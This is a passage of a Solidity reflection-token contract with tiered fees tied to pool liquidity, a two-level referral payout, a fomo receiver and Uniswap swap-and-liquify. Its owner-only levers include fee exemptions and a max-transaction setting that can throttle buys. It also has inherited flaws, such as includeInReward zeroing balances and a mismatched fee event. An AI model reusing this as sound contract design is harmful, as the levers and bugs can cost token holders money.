        _rOwned[sender] = _rOwned[sender].sub(rAmount);
        _rTotal = _rTotal.sub(rAmount);
    }

    function tokenFromReflection(uint256 rAmount) public view returns(uint256) {
        require(rAmount <= _rTotal, "Amount must be less than total reflections");
        return rAmount.div(_getRate());
    }

    function excludeFromReward(address account) public onlyOwner {
        // require(account != 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 'We can not exclude Uniswap router.');
        require(!_isExcluded[account], "Account is already excluded");
        if(_rOwned[account] > 0) {
            _tOwned[account] = tokenFromReflection(_rOwned[account]);
        }
        _isExcluded[account] = true;
        _excluded.push(account);
    }

    function includeInReward(address account) external onlyOwner {
        require(_isExcluded[account], "Account is already excluded");
        for (uint256 i = 0; i < _excluded.length; i++) {
            if (_excluded[i] == account) {
                _excluded[i] = _excluded[_excluded.length - 1];
                _tOwned[account] = 0;
                _isExcluded[account] = false;
                _excluded.pop();
                break;
            }
        }
    }
    
    function excludeFromFee(address account) public onlyOwner {
        _isExcludedFromFee[account] = true;
    }
    
    function includeInFee(address account) public onlyOwner {
        _isExcludedFromFee[account] = false;
    }
   
    function setMaxTxPercent(uint256 maxTxPercent) external onlyOwner {
        _maxTxAmount = _tTotal.mul(maxTxPercent).div(
            10**2
        );
    }

    function setSwapAndLiquifyEnabled(bool _enabled) public onlyOwner {
        swapAndLiquifyEnabled = _enabled;
        emit SwapAndLiquifyEnabledUpdated(_enabled);
    }
    
     //to recieve ETH from uniswapV2Router when swaping
    receive() external payable {}

    function _reflectFee(uint256 rFee) private {
        _rTotal = _rTotal.sub(rFee, "reflect fee");
    }

    function _getTValues(uint256 tAmount) private view returns (uint256 tTransferAmount, uint256 tFomo, uint256 tDev, uint256 tLiquidity, uint256 tFee) {
        if (!feeIt) {
            return (tAmount, 0, 0, 0, 0);
        }
        uint256 healthLevel = getHealthLevel();
        tFomo = tAmount.mul(feeFomo[healthLevel]).div(100);
        tDev = tAmount.mul(feeList[0]).div(100);
        tLiquidity = tAmount.mul(feeLiquidity[healthLevel]).div(100);
        tFee = tAmount.mul(feeFee[healthLevel]).div(100);
        tTransferAmount = tAmount.sub(tFomo).sub(tDev).sub(tLiquidity).sub(tFee);
    }

    function _getRValues(uint256 tAmount, uint256 tTransferAmount, uint256 tFee, uint256 currentRate) private pure returns (uint256, uint256, uint256) {
        uint256 rAmount = tAmount.mul(currentRate);
        uint256 rTransferAmount = tTransferAmount.mul(currentRate);
        uint256 rFee = tFee.mul(currentRate);
        return (rAmount, rTransferAmount, rFee);
    }

    function _getRate() private view returns(uint256) {
        (uint256 rSupply, uint256 tSupply) = _getCurrentSupply();
        return rSupply.div(tSupply);
    }

    function _getCurrentSupply() private view returns(uint256, uint256) {
        uint256 rSupply = _rTotal;
        uint256 tSupply = _tTotal;      
        for (uint256 i = 0; i < _excluded.length; i++) {
            if (_rOwned[_excluded[i]] > rSupply || _tOwned[_excluded[i]] > tSupply) return (_rTotal, _tTotal);
            rSupply = rSupply.sub(_rOwned[_excluded[i]], "sub rSupply");
            tSupply = tSupply.sub(_tOwned[_excluded[i]], "sub tSupply");
        }
        if (rSupply < _rTotal.div(_tTotal)) return (_rTotal, _tTotal);
        return (rSupply, tSupply);
    }
    
    function _takeTax(address tToAddr, uint256 tFomo, uint256 tDev, uint256 tLiquidity) private {
        uint256 currentRate =  _getRate();
        uint256 rLiquidity = tLiquidity.mul(currentRate);
        uint256 rFomo = tFomo.mul(currentRate);
        uint256 rDev = tDev.mul(currentRate);
        
        // tActive0, rActive1, tInvite2, rInvite3, tDevRec4, rDevRec5
        uint256[] memory miscFees = new uint256[](6);
        
        miscFees[0] = tDev.mul(feeList[1]).div(feeList[0]);
        miscFees[1] = miscFees[0].mul(currentRate);
        miscFees[2] = tDev.mul(feeList[2]).div(feeList[0]);
        miscFees[3] = miscFees[2].mul(currentRate);
        
        // Contains two levels of invitation
        miscFees[4] = tDev.sub(miscFees[0]).sub(miscFees[2]).sub(miscFees[2]);
        miscFees[5] = rDev.sub(miscFees[1]).sub(miscFees[3]).sub(miscFees[3]);
        
        address inviteLvOne = IInviteController(inviteController).getInviter(tToAddr);
        address inviteLvTwo = IInviteController(inviteController).getInviter(inviteLvOne);
        
        if(inviteLvOne == address(0)){
            if(devReceivers.length > 0){
                if(devIndex >= devReceivers.length){
                    devIndex = 0;
                }
                devReceiver = devReceivers[devIndex];
                devIndex++;
            }
            inviteLvOne = devReceiver;
        }
        
        if(inviteLvTwo == address(0)){
            if(devReceivers.length > 0){
                if(devIndex >= devReceivers.length){
                    devIndex = 0;
                }
                devReceiver = devReceivers[devIndex];
                devIndex++;
            }
            inviteLvTwo = devReceiver;
        }
        
        if(devReceivers.length > 0){
            if(devIndex >= devReceivers.length){
                devIndex = 0;
            }
            devReceiver = devReceivers[devIndex];
            devIndex++;
        }
        
        _rOwned[address(this)] = _rOwned[address(this)].add(rLiquidity);
        if(_isExcluded[address(this)]) {
            _tOwned[address(this)] = _tOwned[address(this)].add(tLiquidity);
        }
        
        _rOwned[devReceiver] = _rOwned[devReceiver].add(miscFees[5]);
        if (_isExcluded[devReceiver]) {
            _tOwned[devReceiver] = _tOwned[devReceiver].add(miscFees[4]);
        }
        
        _rOwned[inviteLvOne] = _rOwned[inviteLvOne].add(miscFees[3]);
        if(_isExcluded[inviteLvOne]){
            _tOwned[inviteLvOne] = _tOwned[inviteLvOne].add(miscFees[2]);
        }
        
        _rOwned[inviteLvTwo] = _rOwned[inviteLvTwo].add(miscFees[3]);
        if(_isExcluded[inviteLvTwo]){
            _tOwned[inviteLvTwo] = _tOwned[inviteLvTwo].add(miscFees[2]);
        }
        
        _rOwned[activeTradingReceiver] = _rOwned[activeTradingReceiver].add(miscFees[1]);
        if(_isExcluded[activeTradingReceiver]){
            _tOwned[activeTradingReceiver] = _tOwned[activeTradingReceiver].add(miscFees[0]);
        }
        
        _rOwned[fomoReceiver] = _rOwned[fomoReceiver].add(rFomo);
        if (_isExcluded[fomoReceiver]) {
            _tOwned[fomoReceiver] = _tOwned[fomoReceiver].add(tFomo);
        }
        
        if(tLiquidity > 0){
            emit Transfer(uniswapV2Pair, address(this), tLiquidity);
        }
        
        if(miscFees[0] > 0){
            emit Transfer(uniswapV2Pair, activeTradingReceiver, miscFees[0]);
        }
        
        if(miscFees[2] > 0){
            emit Transfer(inviteV1Reward, inviteLvOne, miscFees[2]);
            emit Transfer(inviteV2Reward, inviteLvTwo, miscFees[2]);
        }
        
        if(miscFees[4] > 0){
            emit Transfer(uniswapV2Pair, devReceiver, miscFees[4]);
        }
        
    }

    function getHealthLevel() private view returns(uint256) {
        
        uint256 bal = usdt.balanceOf(uniswapV2Pair);
        if (bal <= 100 * 10**4 * 10**18) {
            return 4;
        } else if (bal <= 300 * 10**4 * 10**18) {
            return 3;
        } else if (bal <= 500 * 10**4 * 10**18) {
            return 2;
        } else if (bal <= 1000 * 10**4 * 10**18) {
            return 1;
        }
        return 0;
    }
    
    function removeAllFee() private {
        if (!feeIt) return;
        feeIt = false;
    }
    
    function restoreAllFee() private {
        feeIt = true;
    }
    
    function isExcludedFromFee(address account) public view returns(bool) {
        return _isExcludedFromFee[account];
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) private transferCounter {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
        enableAddLiquidity(from, to);
        if(from == uniswapV2Pair && from != owner() && to != owner() && to != fomoReceiver)
            require(amount <= _maxTxAmount, "Transfer amount exceeds the maxTxAmount.");

        // is the token balance of this contract address over the min number of
        // tokens that we need to initiate a swap + liquidity lock?
        // also, don't get caught in a circular liquidity event.
        // also, don't swap & liquify if sender is uniswap pair.
        uint256 contractTokenBalance = balanceOf(address(this));
        
        // if(contractTokenBalance >= _maxTxAmount)
        // {
        //     contractTokenBalance = _maxTxAmount;
        // }
        
        bool overMinTokenBalance = (contractTokenBalance >= numTokensSellToAddToLiquidity && balanceOf(uniswapV2Pair) > 0);
        if (
            overMinTokenBalance &&
            !inSwapAndLiquify &&
            from != uniswapV2Pair &&
            swapAndLiquifyEnabled
        ) {
            contractTokenBalance = numTokensSellToAddToLiquidity;
            //add liquidity
            swapAndLiquify(contractTokenBalance);
        }
        
        //indicates if fee should be deducted from transfer
        bool takeFee = true;
        
        //if any account belongs to _isExcludedFromFee account then remove the fee
        if(_isExcludedFromFee[from] || _isExcludedFromFee[to]){
            takeFee = false;
        }

        if (enterCount == 1) {
            if (takeFee && from == uniswapV2Pair && amount >= fomoMin) {
                IFomo(fomoReceiver).transferNotify(to);
                IActiveTradingReward(activeTradingReceiver).transferTradingReward(to);
            }
            if (!inSwapAndLiquify && from != uniswapV2Pair && from != fomoReceiver && from != activeTradingReceiver && balanceOf(uniswapV2Pair) > 0) {
                IFomo(fomoReceiver).swap();
                IActiveTradingReward(activeTradingReceiver).swapTradingReward();
            }
        }
        
        _hadInvited[to] = IInviteController(inviteController).getInvitedState(to);
        if((from == uniswapV2Pair || from == tokenEthPair || from == preSaleContract) && !_hadInvited[to]){
            IInviteController(inviteController).setInviteRelationship(address(0), to);
            _hadInvited[to] = true;
        }
        
        if(!_hadInvited[to]){
            IInviteController(inviteController).setInviteRelationship(from, to);
            _hadInvited[to] = true;
        }
        
        //transfer amount, it will take tax, burn, liquidity fee
        _tokenTransfer(from,to,amount,takeFee);
    }

    function swapAndLiquify(uint256 contractTokenBalance) private lockTheSwap {
        // split the contract balance into halves
        uint256 half = contractTokenBalance.div(2);
        uint256 otherHalf = contractTokenBalance.sub(half, "sub half");

        // capture the contract's current ETH balance.
        // this is so that we can capture exactly the amount of ETH that the
        // swap creates, and not make the liquidity event include any ETH that
        // has been manually sent to the contract
        //uint256 initialBalance = address(this).balance;

        // swap tokens for ETH
        swapTokensForUsdt(half); // <- this breaks the ETH -> HATE swap when swap+liquify is triggered

        // how much ETH did we just swap into?
        // uint256 newBalance = address(this).balance.sub(initialBalance);
        uint256 usdtBalance = usdt.balanceOf(address(this));

        // add liquidity to uniswap
        addLiquidityUsdt(otherHalf, usdtBalance);
        
        emit SwapAndLiquify(half, usdtBalance, otherHalf);
    }

    function swapTokensForUsdt(uint256 tokenAmount) private {
        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = address(usdt);

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(wrap),
            block.timestamp
        );

        wrap.withdraw();
    }

    function swapTokensForEth(uint256 tokenAmount) private {
        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
    }
    
    function swapEthForTokens(uint256 ethSwapAmount) private {
        //swap eth for usdt
        address[] memory path = new address[](2);
        path[0] = uniswapV2Router.WETH();
        path[1] = address(usdt);
        
        uniswapV2Router.swapExactETHForTokensSupportingFeeOnTransferTokens{value: ethSwapAmount}(
            0, // accept any amount of usdt
            path,
            address(this),
            block.timestamp
        );
    }
    
    function addLiquidityUsdt(uint256 tokenAmount, uint256 usdtAmount) private {
        // approve token transfer to cover all possible scenarios
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        usdt.approve(address(uniswapV2Router), usdtAmount);

        uniswapV2Router.addLiquidity(
            address(this),
            address(usdt),
            tokenAmount,
            usdtAmount,
            0,
            0,
            blackHole,
            block.timestamp
        );
    }

    function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        // approve token transfer to cover all possible scenarios
        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // add the liquidity
        uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0, // slippage is unavoidable
            0, // slippage is unavoidable
            blackHole,
            block.timestamp
        );
    }

    //this method is responsible for taking all fee, if takeFee is true
    function _tokenTransfer(address sender, address recipient, uint256 amount,bool takeFee) private {
        if(!takeFee)
            removeAllFee();
        
        if (_isExcluded[sender] && !_isExcluded[recipient]) {
            _transferFromExcluded(sender, recipient, amount);
        } else if (!_isExcluded[sender] && _isExcluded[recipient]) {
            _transferToExcluded(sender, recipient, amount);
        } else if (!_isExcluded[sender] && !_isExcluded[recipient]) {
            _transferStandard(sender, recipient, amount);
        } else if (_isExcluded[sender] && _isExcluded[recipient]) {
            _transferBothExcluded(sender, recipient, amount);
        } else {
            _transferStandard(sender, recipient, amount);
        }
        
        if(!takeFee)
            restoreAllFee();
    }

    function _transferStandard(address sender, address recipient, uint256 tAmount) private {
        (uint256 tTransferAmount, uint256 tFomo, uint256 tDev, uint256 tLiquidity, uint256 tFee) = _getTValues(tAmount);
        (uint256 rAmount, uint256 rTransferAmount, uint256 rFee) = _getRValues(tAmount, tTransferAmount, tFee, _getRate());
        _rOwned[sender] = _rOwned[sender].sub(rAmount, "sub1 rAmount");
        _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount);
        _takeTax(recipient, tFomo, tDev, tLiquidity);
        _reflectFee(rFee);
        emit Transfer(sender, recipient, tTransferAmount);
        if (tFee > 0) {
            emit Transfer(uniswapV2Pair, fomoReceiver, tFomo);
        }
    }

    function _transferToExcluded(address sender, address recipient, uint256 tAmount) private {
        (uint256 tTransferAmount, uint256 tFomo, uint256 tDev, uint256 tLiquidity, uint256 tFee) = _getTValues(tAmount);
        (uint256 rAmount, uint256 rTransferAmount, uint256 rFee) = _getRValues(tAmount, tTransferAmount, tFee, _getRate());
        _rOwned[sender] = _rOwned[sender].sub(rAmount, "sub2 rAmount");
        _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount);
        _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount);           
        _takeTax(recipient, tFomo, tDev, tLiquidity);
        _reflectFee(rFee);
        emit Transfer(sender, recipient, tTransferAmount);
        if (tFee > 0) {
            emit Transfer(uniswapV2Pair, fomoReceiver, tFomo);
        }
    }

    function _transferFromExcluded(address sender, address recipient, uint256 tAmount) private {
        (uint256 tTransferAmount, uint256 tFomo, uint256 tDev, uint256 tLiquidity, uint256 tFee) = _getTValues(tAmount);
        (uint256 rAmount, uint256 rTransferAmount, uint256 rFee) = _getRValues(tAmount, tTransferAmount, tFee, _getRate());
        _tOwned[sender] = _tOwned[sender].sub(tAmount, "sub3 tAmount");
        _rOwned[sender] = _rOwned[sender].sub(rAmount, "sub3 rAmount");
        _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount);   
        _takeTax(recipient, tFomo, tDev, tLiquidity);
        _reflectFee(rFee);
        emit Transfer(sender, recipient, tTransferAmount);
        if (tFee > 0) {
            emit Transfer(uniswapV2Pair, fomoReceiver, tFomo);
        }
    }

    function _transferBothExcluded(address sender, address recipient, uint256 tAmount) private {
        (uint256 tTransferAmount, uint256 tFomo, uint256 tDev, uint256 tLiquidity, uint256 tFee) = _getTValues(tAmount);
        (uint256 rAmount, uint256 rTransferAmount, uint256 rFee) = _getRValues(tAmount, tTransferAmount, tFee, _getRate());
        _tOwned[sender] = _tOwned[sender].sub(tAmount, "sub4 tAmount");
        _rOwned[sender] = _rOwned[sender].sub(rAmount, "sub4 rAmount");
        _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount);
        _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount);        
        _takeTax(recipient, tFomo, tDev, tLiquidity);
        _reflectFee(rFee);
        emit Transfer(sender, recipient, tTransferAmount);
        if (tFee > 0) {
            emit Transfer(uniswapV2Pair, fomoReceiver, tFomo);
        }
    }
}